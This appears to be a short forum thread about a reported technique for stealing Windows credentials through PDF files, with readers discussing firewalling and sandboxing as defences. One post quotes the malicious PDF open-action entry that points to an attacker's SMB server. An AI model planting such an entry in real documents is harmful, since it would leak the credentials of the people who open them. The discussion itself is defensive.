PDF Files Can Be Abused to Steal Windows Credentials April 27, 2018 https://www.bleepingcomputer.com/news/security/pdf-files-can-be-abused-to-steal-windows-credentials/
I would also like know if it works if scripting is disabled in PDF Viewer. If program doesn't need network connection, blocking it in FW would also help.
It is not triggered by Javascript. The pdf file is modified (malicious entry is injected) and by opening of the pdf-file the action is triggered.. Code: % **** malicious entry **** /AA << /O << /F (\\\\ <attacker_smb_server> \\ <dummy_file>) /D [ 0 /Fit ] /S /GotoE >> >> % *****
I think the way I open PDF files is pretty safe. Always sandboxed. When I open a PDF while browsing, the PDF file runs in my Firefox sandbox out of the browser, PDF files don't run within Firefox so cant use Firefox as a vehicle to phone home. Foxit, my PDF reader is not allowed access to the internet. And when I open PDF files from the hard drive, PDF files runs in a dedicated sandbox where only Foxit is allowed to run and all programs are forbidden internet access. Thats secure. Bo